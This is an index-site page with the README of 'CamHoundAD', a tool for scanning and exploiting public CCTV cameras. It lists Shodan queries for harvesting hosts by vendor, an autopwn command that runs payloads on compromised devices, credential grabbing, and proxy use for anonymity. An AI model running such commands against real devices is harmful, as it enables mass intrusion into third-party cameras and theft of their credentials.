Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/byt3n33dl3/camhoundad
Automated Exploit scanners for public Cameras, CCTV's, Devices Cam, Etc. Exploitation tool, Trust Attacks.
https://github.com/byt3n33dl3/camhoundad
camera cctv exploit surveillance trust-attack
Last synced: 15 days ago
JSON representation
Automated Exploit scanners for public Cameras, CCTV's, Devices Cam, Etc. Exploitation tool, Trust Attacks.
- Host: GitHub
- URL: https://github.com/byt3n33dl3/camhoundad
- Owner: byt3n33dl3
- License: lgpl-2.1
- Created: 2024-09-14T07:24:29.000Z (2 months ago)
- Default Branch: main
- Last Pushed: 2024-09-14T15:13:51.000Z (2 months ago)
- Last Synced: 2024-09-18T06:33:23.301Z (about 2 months ago)
- Topics: camera, cctv, exploit, surveillance, trust-attack
- Language: C
- Homepage: https://blog.tmeletlidis.tech/ilovecameras
- Size: 3.31 MB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CamHoundAD
This is a tool meant to assist `Cyber Security` researchers on Discovering outdated and Vulnerable camera systems on the internet by utilizing [shodan.io](shodan.io). I was able to discover thousands of vulnerable cameras using it. It could be for Cammera Attacks research, CCTV's Attacks research, etc.
# Vendors Affected
>- [+] Hikvision
>- [+] Nikon
>- [+] Avtech
>- [+] GoPro
>- [+] TVT
>- [+] Cacti
Coming Soon . . .
# Features
- Fetching of hosts from shodan.io
- [Attacks Key](shodan.io)
- Check for vulnerable cameras
- Automatically run commands on exploited Devices
- Automatically grab camera credentials
- Multi-threading for faster scanning
- Usage of Socks5 proxies for anonymity
- Storing results in Sqlite3 database
- Logging all actions in log files# Prerequisites
To use this tool you need to have the following:
- Shodan API Key
- Socks5 authenticated proxies# Installation
```python
git clone https://github.com/byt3n33dl3/CamHoundAD
pip install -r requirements.txt
python3 scanner.py --help
```# Usage
## Collect hosts in database
```python
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token --query 'product:"Hikvision IP Camera"' --pages 1# Collect Avtech hosts
python3 scanner.py --shodan --api-token --query 'linux upnp avtech' --pages 1# Collect TVT hosts
python3 scanner.py --shodan --api-token --query 'product:"Cross Web Server"' --pages 1# Collect Cacti hosts
python3 scanner.py --shodan --api-token --query 'Login to Cacti' --pages 1
```## Check hosts for exploit
```python
python3 scanner.py --check --proxy-file proxies.txt --threads 20
```## Automatically run command on exploited hosts
```python
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"
```# About CamHoundAD
This tool is purely educational and is inteded to make the internet more secure. **I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.** Any PR's or suggestions on improving this project are welcome
## Exploits Used
[[+] Exploit-db](https://www.exploit-db.com/exploits/40500)
[[+] Exploit-db](https://www.exploit-db.com/exploits/50441)
[[+] RCE](https://github.com/k1p0d/h264_dvr_rce)
[[+] CVE](https://github.com/sAsPeCt488/CVE-2022-46169)